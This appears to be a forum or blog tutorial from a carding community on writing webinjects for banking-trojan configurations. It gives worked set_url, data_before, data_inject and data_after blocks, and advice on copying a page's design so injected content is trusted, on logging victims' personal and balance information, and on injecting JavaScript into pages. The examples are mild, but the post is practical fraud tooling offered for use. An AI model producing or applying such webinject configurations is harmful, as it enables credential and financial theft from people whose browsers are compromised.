How to create Webinjects?

You just need knowledge about: javascript, css, html

STEPS

1. Look too the page HTML source you want to inject, and think about where you will inject your HTML/javascript. USE THE SAME DESIGN LIKE THEY USE ON THE PAGE, then it will be trusted.
2. Find the “real” URL of the page, sometimes it will use AJAX to get page context or frames
3. Sometimes the URL is unique. You can use wildcards the wildcards # and *. the # means just wildcard for 1 charakter and * means 0..* (nothing or more)
4. Think about when you want inject the code, use G (GET) or P (on POST). You also can use both GP (on GET- and POST-requests). TIP on many sites they use forums that post data to same page so use GP.
5. Sometimes you don’t want to inject, just want to grab information like personal info or saldo info then use L (for logging)
6. You can use ; for commenting in webinjects but don’t use this between data_before, data_end or between data_after, data_end. Just use this for new lines I will give example later.. this is just for dumb drugs addicts that forgot why you made the inject
7. The first shit is to set url, you can use wildcards in it if the URL is changing, after that you can add when the inject must apaire,

if you add L (IT WON’T INJECT! you just receive a rapport with the data between data_before
and data_after)

I just give you an example here.. I want to make an inject for this SHIT forum to grab username. Can do that on very much diffrent ways

Way1:

<li><a href=”member.php?3782-FreeZS”>My Profile</a></li>

Way2:

<li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

Way3:

<li><a class=”username” href=”member.php?3782-FreeZS”>FreeZS</a></li>

Now I must figure out on what page it is, but I am lazy so i do:
set_url http://www.true-carders.com/* GPL

This means on GET and POST Logging, this is very useless because my rapports get flooded on each page the name apaire it will grab and send raport

I gonna use Way2 here is the example:

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*”>
data_end

data_inject
Infraud Username:
data_end

data_after
</a></li>
data_end

But there’s also another good working example for Way2:

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*-
data_end

data_inject
Infraud Username:
data_end

data_after
“>
data_end

If I am sure about some things, like my userID is 3782, if I only want grab usernames with 4 digits then I do

I will grab <li class=”welcomelink”>Welcome, <a href=”member.php?3782-FreeZS”>FreeZS</a></li>

;Getting the username
set_url http://www.true-carders.com/* GPL

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?####-
data_end

data_inject
Infraud Username:
data_end

data_after
“>
data_end

I will get rapports with Infraud Username: [HERE_GRABBED_STRING]

Ok now webinjecting.. You understand how to grab shit.. now we can make changes to the page on GET- and POST- requests

;Setting EVERY nickname on welcome to FreeZS
set_url http://www.true-carders.com/* GP

data_before
<li class=”welcomelink”>Welcome, <a href=”member.php?*”>
data_end

data_inject
FreeZS
data_end

data_after
</a></li>
data_end

;Change every title on true-carders.com/* to WebInject-Example
data_before
<title>
data_end

data_inject
WebInject-Example
data_end

data_after
</title>
data_end

;Inject alert() on this thread when browser send GET-request
set_url http://www.true-carders.com/showthread.php?34…ate-Webinjects G

data_before
<script type=”text/javascript”>
<!–
data_end

data_inject
alert(“Hi FreeZS WebInject examples”);
data_end

data_after
var SESSIONURL = “”;
data_end

Hope this is enough for many people

Leave a Reply